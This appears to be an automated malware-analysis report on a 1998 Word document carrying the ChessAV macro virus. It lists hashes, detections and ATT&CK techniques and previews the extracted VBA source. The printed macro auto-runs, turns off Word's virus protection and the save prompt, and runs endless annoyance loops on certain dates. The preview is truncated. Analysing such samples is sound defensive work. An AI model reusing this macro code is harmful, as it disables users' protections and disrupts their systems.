Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d44a0417e05e0c98…

MALICIOUS

Office (OLE)

43.5 KB Created: 1998-05-28 18:06:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: dec9f00b1fdd89265167c8c22eae42bc SHA-1: 50c25796f11abed0dab6bb3ad4e520b66e3baa79 SHA-256: d44a0417e05e0c9882c3ccd0ae0e427c3aa656ffc910fdc18b37fe8665fe6780
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro markers and a VBA macro named 'ChessAV' with an AutoExec subroutine. This macro attempts to disable macro protection and displays repetitive, disruptive messages to the user, characteristic of a classic macro virus. The presence of 'AutoOpen' and 'ToolsMacro' heuristics further supports this classification. The macro's behavior is designed to annoy and potentially hinder the user, rather than download a secondary payload.

Heuristics 4

  • ClamAV: Doc.Trojan.Zmk-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Zmk-4
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21801 bytes
SHA-256: 70a81130ae240961c645f0ed7af55f5abac930be79d03a9376ad6c6e0473d500
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ChessAV"
Sub AutoExec()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorAE
Dim MyDate
MyDate = Date
D$ = Mid(MyDate, 1, 2)
If D$ = "15" Then
Scroll:
    MsgBox "Attention, Je vais vous ennuyer", vbInformation, "Virus ChessAV"
    ActiveWindow.VerticalPercentScrolled = ActiveWindow.VerticalPercentScrolled + 40
    ActiveWindow.VerticalPercentScrolled = ActiveWindow.VerticalPercentScrolled - 40
GoTo Scroll
End If
If D$ = "01" Then
Message
    StatusBar = "Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "       Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "               Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                       Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                               Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                       Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                               Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                       Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                               Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                                       Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                                                Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                                                       Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                                                               Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                                                                       Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                                                                               Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                                                                                       Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                                                                                               Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                                                                                                       Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                                                                                                               Attention, ChessAV vous a infecté, HAHAHAHAHA!!!!!"
    For i = 1 To 500000
    StatusBar = "                                                             
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.